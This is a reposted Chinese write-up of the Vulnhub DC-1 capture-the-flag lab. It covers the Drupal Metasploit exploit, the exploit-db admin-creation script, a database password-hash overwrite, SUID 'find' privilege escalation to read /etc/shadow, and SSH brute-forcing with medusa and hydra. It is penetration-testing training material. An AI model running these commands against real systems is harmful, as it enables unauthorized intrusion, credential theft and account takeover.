ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Vulnhub | DC-1

2022-08-14 13:03:24  阅读:188  来源: 互联网

标签:6.19 加密 DC 192.168 密码 flag4 Vulnhub john


靶场地址

https://www.vulnhub.com/entry/dc-1,292/

信息搜集

探查IP

因为下载的镜像打开是一个登录界面,无法知道它的IP地址,所以这里需要借助一下VMware的特性,查看网络适配器,看看mac地址是多少。

打开KALI,使用命令

arp-scan -l查看

或者用nmap扫描

 

得到靶场的IP地址是192.168.6.19

端口扫描

nmap -sS 192.168.6.19

这里开放了80端口,可以浏览器访问一下试试

通过浏览器插件Wappalyer查看,得到以下信息

 

目录扫描

 

相当于就扫到两个 /robots.txt 和 /user

攻击测试

已知是开源cms Drupal,可以直接查一下有没有相关漏洞能拿来利用

这里直接用MSF

利用漏洞

search drupal

可以一个一个尝试能不能打

这里我尝试 use 1 可以利用

use 1 
set rhosts 192.168.6.19
run

获取flag1

看英文的意思是还要需要一个配置文件

Drupal的配置文件是网站根目录下的sites/defaultx下的setting.php文件。

获得flag2

flag2提示不要使用暴力破解

同时获取到了数据库相关信息,使用的是mysql

远程连接失败了

直接连接也失败了,进入shell模式

但是这种方式不是交互式的,不能进入数据里

输入python -v,发现系统自带Python 2.7.3,通过pty.spawn()获得交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

mysql -udbuser -pR0ck3t

接着就开始查表了

找到drupaldb 表下面有一个users

select * from users;

获得flag3

不知道它的加密方式,也没办法直接修改数据库中的密码

这里有两种方法可以使用:

获取方法一

在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更直接。

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.6.19 -u admin2 -p admin2

然后使用admin2/admin2登录,获取到flag3

获取方法二

(我没试这个方法,但是可以学习一下思路)

使用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下

使用加密脚本加密新密码:2019-123456,生成加密密文

回到数据库中,将密码进行替换

update users set pass=’$S$DqmSfBfFUmIoobomWlB45XSI7MG..o9y9zzUQEc2xGzYXgxfnM19‘ where uid = 1;

更新 表名 设置 列名=’更改的值‘ where 列名=1;

然后使用修改后的账号密码登录。

flag3提示,PERMS可以帮助我们找到密码,在shadow文件里

直接查看被拒绝了,这里考到了提权

获得flag4

使用find命令查找有特殊权限suid的命令

find ./ aaa -exec '/bin/sh' \;

whoami

cat /etc/shadow

flag4是一个账户,我们要做的就是爆破出他的密码

方法有很多

方法一

medusa -M ssh -h 192.168.6.19 -u flag4 -P /usr/share/john/password.lst -e ns -F

方法二

使用hydra+John密码包对flag4的密码进行爆破

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz   #下载John密码包
tar -xvf john-1.8.0.tar.gz  							#解压缩
cd john-1.8.0/ src   								#进入源码目录下
uname -a 									#查看当前系统版本
make linux-x86-64  								#编译并指定当前的Linux系统版本
cd ../run									#切换到密码目录下
hydra -l flag4 -P password.lst ssh://192.168.6.19 -f -vV -o hydraflag4.ssh

 

直接SSH连接

提示flag5在root用户下。

获得flag5

继续使用

find ./ aaa -exec '/bin/sh' \;提权

然后进入root目录下

 

参考链接

渗透测试靶机:DC-1

DC-1详解

 

 

 

标签:6.19,加密,DC,192.168,密码,flag4,Vulnhub,john
来源: https://www.cnblogs.com/mlxwl/p/16585197.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有